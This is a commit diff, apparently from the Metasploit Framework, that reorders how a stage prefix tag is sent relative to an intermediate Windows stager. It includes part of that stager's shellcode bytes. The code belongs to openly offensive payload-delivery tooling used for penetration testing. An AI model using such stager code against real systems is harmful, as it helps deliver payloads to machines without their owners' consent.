the tag used for find tag must be sent BEFORE the intermediate stage
git-svn-id: file:///home/svn/framework3/trunk@5084 4d416f70-5f16-0410-b530-b9f4589650daunstable
Matt Miller
parent
8dcba76799
commit
23da91742e
|
|
@ -74,9 +74,6 @@ module Msf::Payload::Stager
|
|||
# Substitute variables in the stage
|
||||
substitute_vars(p, stage_offsets) if (stage_offsets)
|
||||
|
||||
# Prefix to the stage with whatever may be required and then rock it.
|
||||
p = (self.stage_prefix || '') + p
|
||||
|
||||
return p
|
||||
end
|
||||
|
||||
|
|
@ -93,7 +90,12 @@ module Msf::Payload::Stager
|
|||
# the stage is sent. This gives derived classes an opportunity to
|
||||
# augment the stage and the process through which it is read on the
|
||||
# remote machine.
|
||||
handle_intermediate_stage(conn, p)
|
||||
#
|
||||
# If we don't use an intermediate stage, then we need to prepend the
|
||||
# stage prefix, such as a tag
|
||||
if handle_intermediate_stage(conn, p) == false
|
||||
p = (self.stage_prefix || '') + p
|
||||
end
|
||||
|
||||
print_status("Sending stage (#{p.length} bytes)")
|
||||
|
||||
|
|
@ -128,6 +130,7 @@ module Msf::Payload::Stager
|
|||
# encapsulate its transmission.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
false
|
||||
end
|
||||
|
||||
# Aliases
|
||||
|
|
|
|||
|
|
@ -64,7 +64,7 @@ module Msf::Payload::Windows
|
|||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
return if (payload.length < 512)
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
|
||||
# order (which represents the length of the stage). Following that, it
|
||||
|
|
@ -77,6 +77,10 @@ module Msf::Payload::Windows
|
|||
"\x66\x81\xe4\xfc\xff\x89\xe5\x55\x6a\x00\xff\x33\x55\x57\xff\xd6" +
|
||||
"\x01\xc5\x29\x03\x85\xc0\x75\xf0\xc3"
|
||||
|
||||
# Prepend the stage prefix as necessary, such as a tag that is needed to
|
||||
# find the socket
|
||||
midstager = (self.stage_prefix || '') + midstager
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
|
||||
# Transmit our intermediate stager
|
||||
|
|
@ -90,6 +94,8 @@ module Msf::Payload::Windows
|
|||
# The mid-stage requires that we transmit a four byte length field that
|
||||
# it will use as the length of the subsequent stage.
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue